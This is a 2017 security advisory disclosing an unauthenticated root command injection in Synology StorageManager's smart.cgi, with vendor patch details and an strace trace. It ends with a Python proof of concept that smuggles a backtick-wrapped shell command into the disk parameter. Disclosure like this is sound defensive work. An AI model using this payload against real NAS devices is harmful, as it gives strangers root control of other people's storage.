SSD Advisory – Synology StorageManager smart.cgi Remote Command Execution

Credit to Author: SSD / Maor Schwartz | Date: Mon, 27 Nov 2017 13:45:53 +0000

Want to get paid for a vulnerability similar to this one?
Contact us at: ssd@beyondsecurity.com
See our full scope at: https://blogs.securiteam.com/index.php/product_scope

Vulnerability Summary
The following advisory describes a remote command execution vulnerability found in Synology StorageManager.

Storage Manager is "a management application that helps you organize and monitor the storage capacity on your Synology NAS. Depending on the model and number of installed hard drives, Storage Manager helps you accomplish the following tasks:

- Create different types of RAID and non-RAID storage configurations, such as volumes, disk/RAID groups, iSCSI LUNs, and iSCSI Targets.
- Monitor the overall storage usage of your Synology NAS.
- Inspect the health of installed hard drives and solid state drives.
- Use advanced options, such as hot spare drives, SSD TRIM, SSD cache, and more."

Credit
An independent security researcher, Nigusu Kassahun, has reported this vulnerability to Beyond Security's SecuriTeam Secure Disclosure program.

Vendor response
Synology has released patches to address this vulnerability – DSM 5.2-5967-5

For more information: https://www.synology.com/en-global/releaseNote/DS210+

Vulnerability details
User-controlled input is not sufficiently sanitized before being passed to the execve function.

Successful exploitation of this vulnerability enables a remote, unauthenticated user to run commands as root on the machine.

The vulnerable parameter is found in /webman/modules/StorageManager/smart.cgi, reached with the parameters action=apply&operation=quick&disk=%2Fdev%2Fsda

Strace

```
execve("/usr/syno/bin/smartctl", ["/usr/syno/bin/smartctl", "-d", "ata", "-t", "short", "/dev/sda"],
       ["GATEWAY_INTERFACE=CGI/1.1", "CONTENT_TYPE=application/x-www-form-urlencoded; charset=UTF-8",
        "HTTP_X_REQUESTED_WITH=XMLHttpRequest", "REMOTE_ADDR=192.168.56.1", "QUERY_STRING=", "REMOTE_PORT=34708",
        "DOCUMENT_ROOT=/usr/syno/synoman",
        "HTTP_USER_AGENT=Mozilla/5.0 (X11; Linux i686; rv:47.0) Gecko/20100101 Firefox/47.0", "SERVER_SIGNATURE=",
        "HTTP_ACCEPT=text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "CONTENT_LENGTH=42",
        "SCRIPT_FILENAME=/usr/syno/synoman/webman/modules/StorageManager/smart.cgi", "HTTP_HOST=192.168.56.101:5000",
        "REQUEST_URI=/webman/modules/StorageManager/smart.cgi", "SERVER_SOFTWARE=Apache", "HTTP_CONNECTION=close",
        "MOD_X_SENDFILE_ENABLED=yes",
        "PATH=/sbin:/bin:/usr/sbin:/usr/bin:/usr/syno/sbin:/usr/syno/bin:/usr/local/sbin:/usr/local/bin",
        "HTTP_ACCEPT_LANGUAGE=en-US,en;q=0.5", "HTTP_REFERER=http://192.168.56.101:5000/webman/index.cgi",
        "SERVER_PROTOCOL=HTTP/1.1", "HTTP_ACCEPT_ENCODING=gzip, deflate",
        "SCRIPT_URI=http://192.168.56.101:5000/webman/modules/StorageManager/smart.cgi",
        "SCRIPT_URL=/webman/modules/StorageManager/smart.cgi", "REQUEST_METHOD=POST", "SERVER_ADMIN=admin",
        "SERVER_ADDR=192.168.56.101", "PWD=/usr/syno/synoman/webman/modules/StorageManager", "SERVER_PORT=5000",
        "SCRIPT_NAME=/webman/modules/StorageManager/smart.cgi", "SERVER_NAME=192.168.56.101"]) = 0
```

Proof of Concept

```python
# Synology StorageManager <= 5.2 Remote Root Command Execution
# Python 2 script (httplib, raw_input)

import httplib

HOST = raw_input("Enter Host: ")

# IDOR to bypass auth and ticks to chain commands
conn = httplib.HTTPConnection(HOST)
conn.request("GET", "/webman/modules/StorageManager/smart.cgi?action=apply&operation=quick&disk=/dev/sda`id%20>/tmp/LOL`")
# Read the server's reply and report the HTTP status
res = conn.getresponse()
print res.status, res.reason
```

Source: https://blogs.securiteam.com/index.php/archives/3540